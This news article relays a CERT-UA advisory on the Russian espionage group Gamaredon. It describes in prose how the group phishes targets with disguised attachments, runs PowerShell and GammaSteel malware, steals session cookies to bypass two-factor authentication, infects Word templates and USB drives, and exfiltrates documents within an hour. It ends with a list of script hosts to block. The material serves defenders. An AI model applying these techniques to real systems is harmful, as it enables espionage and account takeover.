The Computer Emergency Response Team of Ukraine (CERT-UA) warns that the Gamaredon hack operates in rapid attacks, stealing data from hacked systems within an hour.
Gamaredon, aka Armageddon, UAC-0010 and Shuckworm, is a Russian, state sponsored cyber espionage hacking group with cyber security researchers linking them to the FSB (Russian Federal Security Service) and having members who are former SSU officers who defected to Russia in 2014.
Since the start of the Russian invasion, threat actors are believed to be responsible for thousands of attacks against the government and other critical public and private organizations in Ukraine.
The accumulation of data from these attacks has allowed CERT-UA to describe the group’s attacks, which it shares to help defenders detect and stop network infiltration attempts.
Gamaredon Attack Traits
Gamaredon attacks usually start with an email or message sent to the targets via Telegram, WhatsApp, Signal or other instant messaging apps.
Initial infection is achieved by tricking the victim into opening malicious attachments such as HTM, HTA and LNK files disguised as Microsoft Word or Excel documents.
Once the victim launches the malicious attachments, powershell scripts and malware (usually ‘GammaSteel’) are downloaded and executed on the victim’s device.
The initial infection step also edits Microsoft Office Word templates so that all documents created on the infected computer contain a malicious macro that can spread Gamaredon malware to other systems.
The PowerShell script targets browser cookies containing session data to allow hackers to take control of online accounts protected by two-factor authentication.
Regarding the functionality of GammaSteel, CERT-UA says it targets files with a specified list of extensions which are: .doc, .docx, .xls, .xlsx, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z, .mdb.
If attackers are interested in documents found on a hacked computer, they exfiltrate them within 30-50 minutes.
Another interesting aspect of Gamaredon infections is that threat actors install up to 120 malicious infected files per week on the compromised system to increase the likelihood of re-infection.
“If during the disinfection process, after cleaning the operating system registry, deleting files, scheduled tasks, etc., at least one infected file or document remains on the computer (very often users reinstall the operating system and transfer the “necessary” documents without checking), the computer will probably be infected again.” explain AU-CERT (translated automatically).
Any USB flash drives inserted into ports on an infected computer will also be automatically infected with Gamaredon’s initial compromise payloads, potentially worsening the breach of isolated networks.
Finally, hackers change the IP addresses of victims’ intermediate command-and-control servers three to six times a day, making it harder for defenders to block or trace their activities.
Currently, CERT-UA states that the best way to limit the effectiveness of Gamaredon attacks is to block or restrict unauthorized execution of mshta.exe, wscript.exe, cscript.exe, and powershell.exe .